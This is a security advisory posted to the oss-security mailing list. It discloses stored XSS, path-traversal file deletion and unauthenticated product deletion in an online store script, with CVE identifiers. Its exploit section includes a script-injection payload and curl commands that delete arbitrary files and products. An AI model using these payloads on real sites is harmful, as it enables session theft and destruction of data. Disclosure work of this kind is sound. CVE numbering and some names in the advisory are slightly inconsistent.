Date: Wed, 02 Oct 2019 06:42:19 -0400 From: Akamai <larry0@...com> To: Open Security <oss-security@...ts.openwall.com> Subject: Multiple vulnerabilities in Online store system v1.0 Stored XSS and unauthenticated product deletions. Title: Multiple vulnerabilities in Online store system v1.0 Stored XSS and unauthenticated product deletions. Author: Larry W. Cashdollar @_larry0 Date: 2019-09-18 CVE-IDs: CVE-2019-8288 CVE-2019-8289 CVE-2019-8290 CVE-2019-8291 Download Site: https://www.abcprintf.com/view_download.php?id=17 Vendor: adcprintf Vendor Notified: 2019-09-18 Vendor Contact: abcprintf@...il.com Advisory: http://www.vapidlabs.com/advisory.php?v=210 Description: "Online store system" is a drop in customizable electronic store front. It has an administrative interface allowing user and product management. Vulnerability: The application contains stored XSS vulnerabilities throughout the form page user_view.php as none of the variables are sanitized before being presented back to the client. This can be exploited by a new user injecting cookie stealing code into their login information form and waiting for an administrative user to navigate to the users panel. CVE-2019-8288 159 echo '<td>'.$row['adidas_member_user'].'</td>'; CVE-2019-8289 160 echo '<td>'. $row['adidas_member_email'] . '</td>'; CVE-2019-8290 The registration form requirements for the member email format can be bypassed by posting directly to sent_register.php allowing special characters to be included and an XSS payload to be injected. CVE-2019-8291 The code in delete_file.php doesn't check to see if a user has administrative rights nor does it check for path traversal allowing a '..' to delete arbitrary files owned by the httpd process. CVE-2019-8292 The code in delete_product.php doesn't check to see if a user has administrative rights before allowing them to delete a product from the database. Exploit Code: 1. Set login name or email to "><script>alert(1);</script> 2. $ curl -s cookie.txt -X POST -d "username=jsmith&password=jsmith123&email=\"><script>alert(1);</script>%40email.com" http://example.com/pso/sent_register.php 3. 4. 5. $ curl -s cookie.txt "http://example.com/pso/admin/delete_file.php?id=0&filename=../women.php" 6. 7. $ curl -s cookie.txt http://example.com/pso/admin/product_delete.php?id=4
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.